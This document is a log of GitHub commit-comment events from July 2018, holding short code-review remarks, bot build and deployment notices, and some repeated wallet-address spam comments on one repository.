{"id":"8005430257","type":"CommitCommentEvent","actor":{"login":"Rideress"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29803611,"position":5,"line":5,"path":"src/main/java/TaskFour/TaskFour.java","commit_id":"b5d335007ed96305474fc5ed529b173d308c557f","created_at":"2018-07-23T17:46:54Z","updated_at":"2018-07-23T17:46:54Z","author_association":"OWNER","body":"Если я убираю имя класса, то джава пишет что не может распознать этот метод\r\n"}},"created_at":"2018-07-23T17:46:54Z"}
{"id":"8005432651","type":"CommitCommentEvent","actor":{"login":"imnotkind"},"repo":{"name":"PLUS-POSTECH/study.plus.or.kr"},"payload":{"comment":{"id":29803613,"position":null,"line":null,"path":null,"commit_id":"9958fa69951827afee7160e3273b2f1488db11b8","created_at":"2018-07-23T17:47:21Z","updated_at":"2018-07-23T17:47:21Z","author_association":"CONTRIBUTOR","body":"헤헷 원래 다른 브랜치 만드는 게 맞겠지만 귀찮아서 그냥 여기다 했습니다 ㅎㅅㅎ"}},"created_at":"2018-07-23T17:47:21Z"}
{"id":"8005437446","type":"CommitCommentEvent","actor":{"login":"amalloy"},"repo":{"name":"crawl/crawl"},"payload":{"comment":{"id":29803629,"position":9,"line":2853,"path":"crawl-ref/docs/crawl_manual.rst","commit_id":"6252f7319728a6102da1c2885bdad630f7021d4a","created_at":"2018-07-23T17:48:19Z","updated_at":"2018-07-23T17:48:19Z","author_association":"CONTRIBUTOR","body":"The rest of this document seems to call the game Crawl, not crawl."}},"created_at":"2018-07-23T17:48:19Z"}
{"id":"8005440937","type":"CommitCommentEvent","actor":{"login":"mrapitis"},"repo":{"name":"piyushkhosla/sdl_ios"},"payload":{"comment":{"id":29803636,"position":4,"line":14,"path":"SmartDeviceLink/SDLRadioControlCapabilities.h","commit_id":"4449771f2bf545426966871b8667a59a7b007198","created_at":"2018-07-23T17:48:58Z","updated_at":"2018-07-23T17:48:58Z","author_association":"NONE","body":"Can we please add the new init method without removing the old method?  Anytime we remove a public method it's considered a breaking change (which we cannot do). Thanks!"}},"created_at":"2018-07-23T17:48:58Z"}
{"id":"8005440947","type":"CommitCommentEvent","actor":{"login":"ben-albrecht"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803637,"position":68,"line":68,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:48:58Z","updated_at":"2018-07-23T17:48:58Z","author_association":"NONE","body":"👍 \r\n\r\nYou can also provide a `config const seed: int` command line argument to feed to the the `fillRandom`, so that you can rerun the same input array."}},"created_at":"2018-07-23T17:48:58Z"}
{"id":"8005441675","type":"CommitCommentEvent","actor":{"login":"janpipek"},"repo":{"name":"ryanmackenziewhite/physt"},"payload":{"comment":{"id":29803638,"position":null,"line":null,"path":null,"commit_id":"b80aaea03eb9b732fd44dd43faab8f728ccd1401","created_at":"2018-07-23T17:49:08Z","updated_at":"2018-07-23T17:49:08Z","author_association":"NONE","body":"Thanks. I will give your idea a thought (as far as my understanding allows) :-) "}},"created_at":"2018-07-23T17:49:08Z"}
{"id":"8005442251","type":"CommitCommentEvent","actor":{"login":"mrapitis"},"repo":{"name":"piyushkhosla/sdl_ios"},"payload":{"comment":{"id":29803640,"position":4,"line":13,"path":"SmartDeviceLink/SDLRadioControlCapabilities.m","commit_id":"4449771f2bf545426966871b8667a59a7b007198","created_at":"2018-07-23T17:49:13Z","updated_at":"2018-07-23T17:49:13Z","author_association":"NONE","body":"Can we please add the new init method without removing the old method?  Anytime we remove a public method it's considered a breaking change (which we cannot do). Thanks!"}},"created_at":"2018-07-23T17:49:13Z"}
{"id":"8005454777","type":"CommitCommentEvent","actor":{"login":"whitedragon0000"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29803664,"position":null,"line":null,"path":null,"commit_id":"e8b8d1cefdf9499c90b3a91354f8ea69bf9d083a","created_at":"2018-07-23T17:51:35Z","updated_at":"2018-07-23T17:51:35Z","author_association":"COLLABORATOR","body":"Ok. Check my grants!\r\nI can't create a new branch "}},"created_at":"2018-07-23T17:51:35Z"}
{"id":"8005455322","type":"CommitCommentEvent","actor":{"login":"edmistj"},"repo":{"name":"SparkDevNetwork/Rock"},"payload":{"comment":{"id":29803667,"position":null,"line":null,"path":null,"commit_id":"06a68e96b02f720fe4b9d52b39042f5003a733d3","created_at":"2018-07-23T17:51:42Z","updated_at":"2018-07-23T17:51:42Z","author_association":"MEMBER","body":"@ethan-sparkdevnetwork could you please adjust this new block setting to be defaulted to true."}},"created_at":"2018-07-23T17:51:42Z"}
{"id":"8005457190","type":"CommitCommentEvent","actor":{"login":"daldoyle"},"repo":{"name":"daldoyle/tsds-services"},"payload":{"comment":{"id":29803673,"position":null,"line":null,"path":null,"commit_id":"0a942dd97792ddf7da323468ad48eca2ad54b6d7","created_at":"2018-07-23T17:52:05Z","updated_at":"2018-07-23T17:52:05Z","author_association":"OWNER","body":"This needs to be changed back to \"insert\" for EL6 line of code"}},"created_at":"2018-07-23T17:52:05Z"}
{"id":"8005459715","type":"CommitCommentEvent","actor":{"login":"codicom"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29803676,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T17:52:33Z","updated_at":"2018-07-23T17:52:33Z","author_association":"NONE","body":"Great Project,good luck."}},"created_at":"2018-07-23T17:52:33Z"}
{"id":"8005460009","type":"CommitCommentEvent","actor":{"login":"kosua20"},"repo":{"name":"kosua20/MIDIVisualizer"},"payload":{"comment":{"id":29803678,"position":null,"line":null,"path":null,"commit_id":"3e2c7bd33f91724625023fbf316f8f0080c5a4b7","created_at":"2018-07-23T17:52:37Z","updated_at":"2018-07-23T17:52:37Z","author_association":"OWNER","body":"Hello ! The \"releases\" tab is here: https://github.com/kosua20/MIDIVisualizer/releases\r\nThere are download links for the macOS and Windows versions."}},"created_at":"2018-07-23T17:52:37Z"}
{"id":"8005463578","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29803682,"position":null,"line":null,"path":null,"commit_id":"c99fb8e4312caf43d8e91e7958de64fb7f08957f","created_at":"2018-07-23T17:53:17Z","updated_at":"2018-07-23T17:53:17Z","author_association":"COLLABORATOR","body":"Ah, you're right... Seems I overlooked that."}},"created_at":"2018-07-23T17:53:17Z"}
{"id":"8005464237","type":"CommitCommentEvent","actor":{"login":"scchan"},"repo":{"name":"RadeonOpenCompute/hcc"},"payload":{"comment":{"id":29803683,"position":null,"line":null,"path":null,"commit_id":"614b056188fcf78a5db5a6e62dd34a051b140fa0","created_at":"2018-07-23T17:53:24Z","updated_at":"2018-07-23T17:53:24Z","author_association":"COLLABORATOR","body":"yes, I'm aware of this issue, I only realized a problem with rocdl after I push the hcc branch to github.  I'll have to fix the reference to rocdl in our internal build first before I could push the fix to github"}},"created_at":"2018-07-23T17:53:24Z"}
{"id":"8005471598","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29803695,"position":null,"line":null,"path":null,"commit_id":"d011a5c80cf2f19e8943a2602571f8280f1dc45a","created_at":"2018-07-23T17:54:50Z","updated_at":"2018-07-23T17:54:50Z","author_association":"OWNER","body":"commit index"}},"created_at":"2018-07-23T17:54:50Z"}
{"id":"8005472566","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29803696,"position":null,"line":null,"path":null,"commit_id":"faced5f698fb150b0d714225a5190d24e4f6ad21","created_at":"2018-07-23T17:55:02Z","updated_at":"2018-07-23T17:55:02Z","author_association":"OWNER","body":"Just another tip: Whenever there's an EXTRACT_INFO or EXTRACT_VERSION, it usually means there are multiple ports that need it.  You can't update one port at a time.  For example, in this case, perl-subversion got broken because the subversion version was updated but that port wasn't regenerated.  So all the EXTRACT_ updates should be handled with extra care (bells go off / flags raise, etc)."}},"created_at":"2018-07-23T17:55:02Z"}
{"id":"8005476708","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29803706,"position":null,"line":null,"path":null,"commit_id":"3c026d3dddd64c36043fd284bb136016fb71a0ef","created_at":"2018-07-23T17:55:49Z","updated_at":"2018-07-23T17:55:49Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3838htacce](https://3838htacce-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/platform-considerations](https://3838htacce-static-docs.pantheonsite.io/docs/platform-considerations)\n"}},"created_at":"2018-07-23T17:55:49Z"}
{"id":"8005479357","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29803711,"position":null,"line":null,"path":null,"commit_id":"acd5cb8da88120d021c581ab9807ccfb9bf85658","created_at":"2018-07-23T17:56:20Z","updated_at":"2018-07-23T17:56:20Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [029 - Adicionar Numero Residencia ao método de gerar rota](https://trello.com/c/ku6aEvff/37-029-adicionar-numero-residencia-ao-m%C3%A9todo-de-gerar-rota)"}},"created_at":"2018-07-23T17:56:20Z"}
{"id":"8005480556","type":"CommitCommentEvent","actor":{"login":"SvetlanaTs"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29803716,"position":140,"line":93,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"af4d61a6858276d02801a70e6574b0d567a357a0","created_at":"2018-07-23T17:56:34Z","updated_at":"2018-07-23T17:56:34Z","author_association":"OWNER","body":"Обычно используют для ячейки, высота которой заранее не известна.\r\n\r\nНе получается изменить высоту content view ячейки, хотя row height у каждой ячейки установлен свой. Еще попробую."}},"created_at":"2018-07-23T17:56:34Z"}
{"id":"8005484197","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29803726,"position":34,"line":34,"path":"radixsort_lsd_final.chpl","commit_id":"42418a24f1e2f7bc12451fad7b6b649edf9939ef","created_at":"2018-07-23T17:57:18Z","updated_at":"2018-07-23T17:57:18Z","author_association":"NONE","body":"I had the same feedback for the LSB radix sort but I'd like these loops to go forward rather than backwards. To do so, you can make the counts array start at 0 at this point."}},"created_at":"2018-07-23T17:57:18Z"}
{"id":"8005485793","type":"CommitCommentEvent","actor":{"login":"Stas1976"},"repo":{"name":"Stas1976/Responsive_WEB_Design"},"payload":{"comment":{"id":29803728,"position":null,"line":null,"path":null,"commit_id":"46d1c2817907e161637c33d00b04eaa966db1edc","created_at":"2018-07-23T17:57:37Z","updated_at":"2018-07-23T17:57:37Z","author_association":"OWNER","body":"Needed to set menu bar\r\n"}},"created_at":"2018-07-23T17:57:37Z"}
{"id":"8005486916","type":"CommitCommentEvent","actor":{"login":"IBryt"},"repo":{"name":"IBryt/job4j"},"payload":{"comment":{"id":29803729,"position":20,"line":20,"path":"chapter_004/src/main/java/list/Node.java","commit_id":"45cb6f20a70ea4437d1e6fc06504668b34825ad4","created_at":"2018-07-23T17:57:50Z","updated_at":"2018-07-23T17:57:50Z","author_association":"OWNER","body":"Пересена из 16 строки на 20"}},"created_at":"2018-07-23T17:57:50Z"}
{"id":"8005488103","type":"CommitCommentEvent","actor":{"login":"aphillips"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29803731,"position":59,"line":1391,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T17:58:04Z","updated_at":"2018-07-23T17:58:04Z","author_association":"OWNER","body":"Actually, it should say \"case sensitive\" :-). I changed the names based on our discussion below and elsewhere."}},"created_at":"2018-07-23T17:58:04Z"}
{"id":"8005490036","type":"CommitCommentEvent","actor":{"login":"nerdatwork"},"repo":{"name":"nicehash/NiceHashMinerLegacy"},"payload":{"comment":{"id":29803736,"position":null,"line":null,"path":null,"commit_id":"56c992ec50b542e1e28a12c1c8a45ca85970469f","created_at":"2018-07-23T17:58:26Z","updated_at":"2018-07-23T17:58:26Z","author_association":"NONE","body":"Why commit a version upgrade and not release any update for 5 days ? If it needs more testing then why give it a version bump !!"}},"created_at":"2018-07-23T17:58:26Z"}
{"id":"8005491350","type":"CommitCommentEvent","actor":{"login":"aphillips"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29803741,"position":60,"line":1392,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T17:58:42Z","updated_at":"2018-07-23T17:58:42Z","author_association":"OWNER","body":"done."}},"created_at":"2018-07-23T17:58:42Z"}
{"id":"8005491428","type":"CommitCommentEvent","actor":{"login":"dmedri"},"repo":{"name":"GNOME/gegl"},"payload":{"comment":{"id":29803743,"position":17,"line":0,"path":"docs/NEWS.txt","commit_id":"1b2634494ddc9cc62d127907e8d5d518e7e67224","created_at":"2018-07-23T17:58:42Z","updated_at":"2018-07-23T17:58:42Z","author_association":"NONE","body":"\"to to\" minor mistake in description."}},"created_at":"2018-07-23T17:58:42Z"}
{"id":"8005493560","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29803745,"position":null,"line":null,"path":null,"commit_id":"9899c56115738488b51edb8562c1b65263b55020","created_at":"2018-07-23T17:59:09Z","updated_at":"2018-07-23T17:59:09Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-945](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-945).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-945-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T17:59:09Z"}
{"id":"8005493730","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse_docker"},"payload":{"comment":{"id":29803746,"position":null,"line":null,"path":null,"commit_id":"9d8da4b385ef7cbca99491a76f54af35ef205b91","created_at":"2018-07-23T17:59:10Z","updated_at":"2018-07-23T17:59:10Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/rebuild-app-failed/92939/4\n"}},"created_at":"2018-07-23T17:59:10Z"}
{"id":"8005499342","type":"CommitCommentEvent","actor":{"login":"mattman578"},"repo":{"name":"mattman578/puppetlabs-postgresql"},"payload":{"comment":{"id":29803753,"position":null,"line":null,"path":null,"commit_id":"27a48138c9c2d6d3727f9dda7a25e2ffd15d9d4e","created_at":"2018-07-23T18:00:15Z","updated_at":"2018-07-23T18:00:15Z","author_association":"OWNER","body":"Thanks I knew is was on my end\n\nOn Mon, Jul 23, 2018 at 8:45 AM, Ewoud Kohl van Wijngaarden <\nnotifications@github.com> wrote:\n\n> That sounds like you're trying to run Puppet 4 code with Puppet 3.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mattman578/puppetlabs-postgresql/commit/27a48138c9c2d6d3727f9dda7a25e2ffd15d9d4e#commitcomment-29799721>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnkJK8_peXq-hXrl92ozLenXXW70PDaVks5uJcVUgaJpZM4Va65H>\n> .\n>\n\n\n\n-- \nMatthew Ayres\nLinux SA\nPH 301-683-3792\n"}},"created_at":"2018-07-23T18:00:15Z"}
{"id":"8005507970","type":"CommitCommentEvent","actor":{"login":"JanneSoon"},"repo":{"name":"kenijey/harshenuniverse"},"payload":{"comment":{"id":29803777,"position":null,"line":null,"path":null,"commit_id":"18d3b077114da8174ff517279c9f4549562fd29d","created_at":"2018-07-23T18:01:50Z","updated_at":"2018-07-23T18:01:50Z","author_association":"NONE","body":"Thank you."}},"created_at":"2018-07-23T18:01:50Z"}
{"id":"8005522074","type":"CommitCommentEvent","actor":{"login":"ChrisCatCai"},"repo":{"name":"TWUOnline/moodlehelp"},"payload":{"comment":{"id":29803796,"position":null,"line":null,"path":null,"commit_id":"9c0fbc7ad1acc91c4235eab4851c13666b956d93","created_at":"2018-07-23T18:04:35Z","updated_at":"2018-07-23T18:04:35Z","author_association":"COLLABORATOR","body":"Looks good"}},"created_at":"2018-07-23T18:04:35Z"}
{"id":"8005525096","type":"CommitCommentEvent","actor":{"login":"Ulisses-champ83"},"repo":{"name":"yuya-oc/desktop"},"payload":{"comment":{"id":29803812,"position":null,"line":null,"path":null,"commit_id":"7a1b8cc2c4a673e0b0cef0bb717963c9466d00d5","created_at":"2018-07-23T18:05:10Z","updated_at":"2018-07-23T18:05:10Z","author_association":"NONE","body":"where my team/and team-value.wee need to put togher"}},"created_at":"2018-07-23T18:05:10Z"}
{"id":"8005527355","type":"CommitCommentEvent","actor":{"login":"Kefta"},"repo":{"name":"gspetrou/TerrortownTwo"},"payload":{"comment":{"id":29803815,"position":null,"line":null,"path":null,"commit_id":"3c2dd522fd4460131d73bbb4dad4b2e70b6e8448","created_at":"2018-07-23T18:05:38Z","updated_at":"2018-07-23T18:05:38Z","author_association":"COLLABORATOR","body":"Uhhhhhh didn't know I had permission to commit to this repo. Was supposed to be a PR :no_mouth: "}},"created_at":"2018-07-23T18:05:38Z"}
{"id":"8005527600","type":"CommitCommentEvent","actor":{"login":"jcramer"},"repo":{"name":"simpleledger/simple-ledger-protocol"},"payload":{"comment":{"id":29803816,"position":null,"line":null,"path":null,"commit_id":"08fa657c9ec18b87c59878bf7e82f61434551cd7","created_at":"2018-07-23T18:05:41Z","updated_at":"2018-07-23T18:05:41Z","author_association":"MEMBER","body":"Hi.  Thank you for your note.  \r\n\r\nIndeed, there is a lot to think about with \"smart contracts\" and how they are actually can interface with our society in a meaningful way.\r\n\r\nWe are building SLP as a tokenization protocol, and the protocol can be extended by anyone for various types of tokens when more complicated situations arise.   For example, Securities tokens will not be able to operate on a complete permissionless basis due to contracts between people and also regulatory restrictions.\r\n\r\nOther types of tokens are currently being considered and will likely be developed for SLP, such as Voting Tokens and Ticketing Token types.\r\n\r\nOur first task, however, is to get Permissionless tokens working very well before we start extending the protocol for more complicated use cases.  One of these extensions might be a token to work for your type application if the permissionless token cannot fit the bill.\r\n\r\nPlease check out the Google Doc for the Token Type 0x01 specification and let me know if that type of token works for your application.\r\n\r\nCheers!\r\n\r\nJames"}},"created_at":"2018-07-23T18:05:41Z"}
{"id":"8005534562","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29803829,"position":null,"line":null,"path":null,"commit_id":"faced5f698fb150b0d714225a5190d24e4f6ad21","created_at":"2018-07-23T18:06:55Z","updated_at":"2018-07-23T18:06:55Z","author_association":"COLLABORATOR","body":"Ah, need to get used to do some grepping in this case... :/"}},"created_at":"2018-07-23T18:06:55Z"}
{"id":"8005537979","type":"CommitCommentEvent","actor":{"login":"sounakpal"},"repo":{"name":"prateek3189/Mercury"},"payload":{"comment":{"id":29803835,"position":8,"line":7,"path":"SCSS/_header.scss","commit_id":"c4df25b718df824d6f520b0cfc10138dc8d39ac7","created_at":"2018-07-23T18:07:36Z","updated_at":"2018-07-23T18:07:36Z","author_association":"NONE","body":"hey guys apply mobile first approach if any or leave it for mobile for now.\r\n"}},"created_at":"2018-07-23T18:07:36Z"}
{"id":"8005539018","type":"CommitCommentEvent","actor":{"login":"vietquoc1960"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29803836,"position":null,"line":null,"path":null,"commit_id":"875ffd6b3fb65c3f69deb4f269e87efda447cc8c","created_at":"2018-07-23T18:07:49Z","updated_at":"2018-07-23T18:07:49Z","author_association":"NONE","body":"Ok My wallet ethereum : 19rEYpV9SnUcW825gGQ8WHHBTScoCrma8D\r\n\r\n   Thankfuly "}},"created_at":"2018-07-23T18:07:49Z"}
{"id":"8005539749","type":"CommitCommentEvent","actor":{"login":"sounakpal"},"repo":{"name":"prateek3189/Mercury"},"payload":{"comment":{"id":29803837,"position":6,"line":7,"path":"SCSS/_footer.scss","commit_id":"c4df25b718df824d6f520b0cfc10138dc8d39ac7","created_at":"2018-07-23T18:07:58Z","updated_at":"2018-07-23T18:07:58Z","author_association":"NONE","body":"lets talk about naming"}},"created_at":"2018-07-23T18:07:58Z"}
{"id":"8005539965","type":"CommitCommentEvent","actor":{"login":"mbroadst"},"repo":{"name":"mongodb-js/mongodb-core"},"payload":{"comment":{"id":29803838,"position":null,"line":null,"path":null,"commit_id":"107bae5083d40b8521b5796469ddbc3ea2063c7a","created_at":"2018-07-23T18:08:01Z","updated_at":"2018-07-23T18:08:01Z","author_association":"COLLABORATOR","body":"@vkarpov15 agreed, I think we should achieve this by implementing [happy eyeballs](https://en.wikipedia.org/wiki/Happy_Eyeballs) rather than our current approach. "}},"created_at":"2018-07-23T18:08:01Z"}
{"id":"8005539974","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29803839,"position":null,"line":null,"path":null,"commit_id":"85774f230b3d28f6b306e8e0a279a95af6cb82de","created_at":"2018-07-23T18:08:01Z","updated_at":"2018-07-23T18:08:01Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - x86_64-MacOS-10.9-clang: Tests Failed (624 of 2944 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-21.2%25-red.png)</a> \n"}},"created_at":"2018-07-23T18:08:01Z"}
{"id":"8005543032","type":"CommitCommentEvent","actor":{"login":"vietquoc1960"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29803848,"position":null,"line":null,"path":null,"commit_id":"875ffd6b3fb65c3f69deb4f269e87efda447cc8c","created_at":"2018-07-23T18:08:38Z","updated_at":"2018-07-23T18:08:38Z","author_association":"NONE","body":"Ok My wallet ethereum : 19rEYpV9SnUcW825gGQ8WHHBTScoCrma8D\r\n\r\nThankfuly\r\n\r\n"}},"created_at":"2018-07-23T18:08:38Z"}
{"id":"8005543925","type":"CommitCommentEvent","actor":{"login":"vietquoc1960"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29803849,"position":1,"line":33,"path":"topics-todo.md","commit_id":"875ffd6b3fb65c3f69deb4f269e87efda447cc8c","created_at":"2018-07-23T18:08:48Z","updated_at":"2018-07-23T18:08:48Z","author_association":"NONE","body":"Ok My wallet ethereum : 19rEYpV9SnUcW825gGQ8WHHBTScoCrma8D\r\n\r\nThankfuly\r\n\r\n"}},"created_at":"2018-07-23T18:08:48Z"}
{"id":"8005550802","type":"CommitCommentEvent","actor":{"login":"jq"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":29803859,"position":241,"line":241,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"2c4359e914ebdd76d5c22619cdad7213d29fa206","created_at":"2018-07-23T18:10:13Z","updated_at":"2018-07-23T18:10:13Z","author_association":"NONE","body":"@yanboliang @CodingCat transformLeaf is missing after this PR, any suggestions? "}},"created_at":"2018-07-23T18:10:13Z"}
{"id":"8005551031","type":"CommitCommentEvent","actor":{"login":"vietquoc1960"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29803862,"position":null,"line":null,"path":null,"commit_id":"898528f45c3c7772347535d8b9a7e9125c12e971","created_at":"2018-07-23T18:10:16Z","updated_at":"2018-07-23T18:10:16Z","author_association":"NONE","body":"Ok My wallet ethereum : 19rEYpV9SnUcW825gGQ8WHHBTScoCrma8D\r\n\r\nThankfuly\r\n\r\n"}},"created_at":"2018-07-23T18:10:16Z"}
{"id":"8005552350","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29803863,"position":null,"line":null,"path":null,"commit_id":"086536e71a5fcc561d31a27a8e8bca81d21afdfb","created_at":"2018-07-23T18:10:31Z","updated_at":"2018-07-23T18:10:31Z","author_association":"OWNER","body":"`foldInlineList` would be better implemented by factoring out the common stuff, and having a sub-function that branches on `EnumType` for the differences.\r\n\r\nI am fairly sure that there is a combinator that does what `makeList` does, somewhere."}},"created_at":"2018-07-23T18:10:31Z"}
{"id":"8005553230","type":"CommitCommentEvent","actor":{"login":"vietquoc1960"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29803867,"position":null,"line":null,"path":null,"commit_id":"898528f45c3c7772347535d8b9a7e9125c12e971","created_at":"2018-07-23T18:10:41Z","updated_at":"2018-07-23T18:10:41Z","author_association":"NONE","body":"Ok My wallet ethereum : 19rEYpV9SnUcW825gGQ8WHHBTScoCrma8D\r\n\r\nThankfuly\r\n\r\n"}},"created_at":"2018-07-23T18:10:41Z"}
{"id":"8005555233","type":"CommitCommentEvent","actor":{"login":"vietquoc1960"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29803870,"position":null,"line":null,"path":null,"commit_id":"898528f45c3c7772347535d8b9a7e9125c12e971","created_at":"2018-07-23T18:11:07Z","updated_at":"2018-07-23T18:11:07Z","author_association":"NONE","body":"Ok My wallet ethereum : 19rEYpV9SnUcW825gGQ8WHHBTScoCrma8D\r\n\r\nThankfuly\r\n\r\n"}},"created_at":"2018-07-23T18:11:07Z"}
{"id":"8005556047","type":"CommitCommentEvent","actor":{"login":"alboteanud"},"repo":{"name":"googlecodelabs/android-build-an-app-architecture-components"},"payload":{"comment":{"id":29803872,"position":null,"line":null,"path":null,"commit_id":"42a4d4f3b7900f0a4aaf016838bcaaab1e861f39","created_at":"2018-07-23T18:11:16Z","updated_at":"2018-07-23T18:11:16Z","author_association":"NONE","body":"same here. \r\nerror: package com.example.android.sunshine.databinding does not exist"}},"created_at":"2018-07-23T18:11:16Z"}
{"id":"8005556567","type":"CommitCommentEvent","actor":{"login":"joshua-ramer"},"repo":{"name":"mscharp/amazon-kinesis-client"},"payload":{"comment":{"id":29803873,"position":null,"line":null,"path":null,"commit_id":"fa6b85838b5ec63d2cc068480a8b50985d4410e9","created_at":"2018-07-23T18:11:23Z","updated_at":"2018-07-23T18:11:23Z","author_association":"NONE","body":"Hey MSCHARP,\r\n       I pulled your repo to try this out, but I can't compile it without errors. Could there be something amiss? I'm in the root of your repository using \"mvn clean install -U -Dgpg.skip=true -X\" to compile.\r\nThanks,\r\n\r\nJosh"}},"created_at":"2018-07-23T18:11:23Z"}
{"id":"8005557926","type":"CommitCommentEvent","actor":{"login":"adherent23"},"repo":{"name":"adherent23/Test-for----"},"payload":{"comment":{"id":29803877,"position":null,"line":null,"path":null,"commit_id":"690a38c0c2db3d2fa7ed016d38ec2e3b83b4dcd9","created_at":"2018-07-23T18:11:38Z","updated_at":"2018-07-23T18:11:38Z","author_association":"OWNER","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=1)"}},"created_at":"2018-07-23T18:11:38Z"}
{"id":"8005558892","type":"CommitCommentEvent","actor":{"login":"vietquoc1960"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29803880,"position":null,"line":null,"path":null,"commit_id":"898528f45c3c7772347535d8b9a7e9125c12e971","created_at":"2018-07-23T18:11:50Z","updated_at":"2018-07-23T18:11:50Z","author_association":"NONE","body":"Ok My wallet ethereum : 19rEYpV9SnUcW825gGQ8WHHBTScoCrma8D\r\n\r\nThankfuly\r\n\r\n"}},"created_at":"2018-07-23T18:11:50Z"}
{"id":"8005559818","type":"CommitCommentEvent","actor":{"login":"cdupuis"},"repo":{"name":"atomist/sdm-pack-fingerprints"},"payload":{"comment":{"id":29803881,"position":4,"line":4,"path":"src/handlers/commands/pushImpactCommandHandlers.ts","commit_id":"430140fbc6d088a9916aeef6923ee0ec43ad17e2","created_at":"2018-07-23T18:12:01Z","updated_at":"2018-07-23T18:12:01Z","author_association":"CONTRIBUTOR","body":"import * as _ from \"lodash\";"}},"created_at":"2018-07-23T18:12:01Z"}
{"id":"8005564386","type":"CommitCommentEvent","actor":{"login":"cdupuis"},"repo":{"name":"atomist/sdm-pack-fingerprints"},"payload":{"comment":{"id":29803889,"position":19,"line":57,"path":"src/handlers/commands/pushImpactCommandHandlers.ts","commit_id":"430140fbc6d088a9916aeef6923ee0ec43ad17e2","created_at":"2018-07-23T18:12:56Z","updated_at":"2018-07-23T18:12:56Z","author_association":"CONTRIBUTOR","body":"`@Value` is for injecting configuration values or objects. You probably want to declare a bot parameters: `@Parameter({ description: \"something\" })"}},"created_at":"2018-07-23T18:12:56Z"}
{"id":"8005568102","type":"CommitCommentEvent","actor":{"login":"cdupuis"},"repo":{"name":"atomist/sdm-pack-fingerprints"},"payload":{"comment":{"id":29803891,"position":60,"line":127,"path":"src/handlers/commands/pushImpactCommandHandlers.ts","commit_id":"430140fbc6d088a9916aeef6923ee0ec43ad17e2","created_at":"2018-07-23T18:13:40Z","updated_at":"2018-07-23T18:13:40Z","author_association":"CONTRIBUTOR","body":"`queryPreference(cli.context.graphClient)`?"}},"created_at":"2018-07-23T18:13:40Z"}
